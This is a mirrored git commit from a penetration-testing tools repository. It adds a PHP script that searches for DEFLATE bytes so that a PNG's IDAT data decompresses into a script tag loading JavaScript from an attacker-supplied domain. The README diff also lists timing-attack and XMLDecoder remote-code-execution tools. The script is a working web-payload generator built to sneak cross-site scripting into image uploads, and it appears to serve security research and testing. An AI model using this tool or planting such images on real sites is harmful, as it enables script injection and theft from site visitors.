mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-12-22 09:05:06 +01:00
Added my very simple script named generate_png_backdoor_idat_chunks.php
This commit is contained in:
parent
8c23453c9f
commit
5e2c945322
@ -20,6 +20,8 @@
|
||||
|
||||
- **`dummy-web-server.py`** - a minimal http server in python. Responds to GET, HEAD, POST requests, but will fail on anything else. Forked from: [bradmontgomery/dummy-web-server.py](https://gist.github.com/bradmontgomery/2219997) ([gist](https://gist.github.com/mgeeky/c0675b2cf65bad6171edcb8f3bb2af6d))
|
||||
|
||||
- **`generate_png_backdoor_idat_chunks.php`** - PHP script implementing idea of encoding Web Shells in PNG iDAT chunks, according to [this](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/) research.
|
||||
|
||||
- **`http-auth-timing.py`** - HTTP Auth Timing attack tool as presented at Ruxcon CTF 2012 simple web challange. The tools tries to use every letter for auth password and construct the entire password upon the longest took authentication request. ([gist](https://gist.github.com/mgeeky/57e866604942f1824da310982c46da84))
|
||||
|
||||
- **`java-XMLDecoder-RCE.md`** - Java Beans XMLDecoder XML-deserialization Remote Code Execution payloads. ([gist](https://gist.github.com/mgeeky/5eb48b17c9d282ad3170ef91cfb6fe4c))
|
||||
|
36
web/generate_png_backdoor_idat_chunks.php
Executable file
36
web/generate_png_backdoor_idat_chunks.php
Executable file
@ -0,0 +1,36 @@
|
||||
<?php
|
||||
$domain = strtoupper($argv[1]);
|
||||
$filename = $argv[2];
|
||||
|
||||
// DEFLATE stream bytes
|
||||
$prefix = '7ff399281922111510691928276e6e';
|
||||
$suffix = '576e69b16375535b6f';
|
||||
|
||||
$precode = '<SCRIPT SRC=//';
|
||||
$postcode = '></SCRIPT>';
|
||||
|
||||
print "Input string to embed in PNG IDAT chunks:\n";
|
||||
print '"' . $precode . $domain . $postcode . "\"\n\n\n";
|
||||
|
||||
$cnt = 0;
|
||||
for( $i = 0x111111111111; $i < 0xffffffffffff; $i++, $cnt++) {
|
||||
$b = implode('', str_split(str_pad(dechex($i), 12, '0', STR_PAD_LEFT), 2));
|
||||
|
||||
try {
|
||||
$defl = gzdeflate(hex2bin($prefix . $b . $suffix ));
|
||||
|
||||
if ( $cnt % 100000 == 0) {
|
||||
printf("[Probe: %06d] %s\r\n", $cnt, $defl);
|
||||
}
|
||||
|
||||
if (strpos(strtoupper($defl), $precode.$domain.$postcode) !== false ) {
|
||||
$cont = bin2hex($defl);
|
||||
printf("DEFLATE stream found!\n%s\n%s\n\n", $prefix.$b.$suffix, $defl);
|
||||
file_put_contents($filename, $cont);
|
||||
}
|
||||
} catch( exception $e) {
|
||||
}
|
||||
}
|
||||
|
||||
print 'Done.'
|
||||
?>
|
Loading…
Reference in New Issue
Block a user